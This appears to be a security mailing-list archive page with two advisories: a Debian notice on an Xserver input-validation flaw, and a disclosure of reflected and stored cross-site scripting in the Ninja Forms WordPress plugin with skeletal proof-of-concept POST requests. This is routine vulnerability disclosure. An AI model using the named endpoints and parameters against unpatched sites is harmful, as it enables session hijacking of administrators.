Olivier Fourdan discovered that missing input validation in the Xserver's
handling of XkbSetGeometry requests may result in an information leak
or denial of service.

For the stable distribution (wheezy), this problem has been fixed in
version 2:1.12.4-6+deb7u6.

For the unstable distribution (sid), this problem has been fixed in
version 2:1.16.4-1.

We recommend that you upgrade your xorg-server packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



Ninja Forms WordPress Plugin Multiple Cross-Site Scripting Vulnerability

2015-02-11 Thread sn

- Title: Ninja Forms WordPress Plugin Multiple Cross-Site Scripting Vulnerability
- Vulnerable Version: 2.8.8 and probably prior
- Tested Version: 2.8.8
- Vendor Notification: 20 November 2014
- Vendor Patch: 20 November 2014
- Vulnerability Type: Cross-Site Scripting [CWE-79]
- CVE Reference: TBC
- Discovered by: Sergio Navarro of Dionach
- - 

VULNERABILITY
Two XSS vulnerabilities have been discovered in the Ninja Forms WordPress plugin 
which can be exploited against administrators of WordPress (with the vulnerable 
plugin) to perform Cross-Site Scripting.
1) Reflected XSS
The issue was found in the success notification message that the Ninja Forms 
plugin displays in users' browsers after users submit their details successfully 
through the plugin contact form. Anonymous attackers could use the 
vulnerability to take control of the victim's browser or steal other users' 
sessions and so access their personal details.
Proof of concept:
POST 
http://www.example.com/wp-admin/admin-ajax.php?action=ninja_forms_ajax_submit 
[…]
ninja_forms_field_1=TEST
[…]

--
2) Stored XSS
This issue is exploited when administrator users with access to the Ninja 
Forms submissions list attempt to edit the user submitted values. A malicious 
administrator can hijack other users' sessions, take control of another 
administrator's browser or install malware on their computer.
Proof of concept:
POST http://www.example.com/wp-admin/post.php 
fields[1]=TEST 
-===
SOLUTION:
Update to Ninja Forms 2.8.11, which includes a fix for this vulnerability.
-===
Credits: Sergio Navarro of Dionach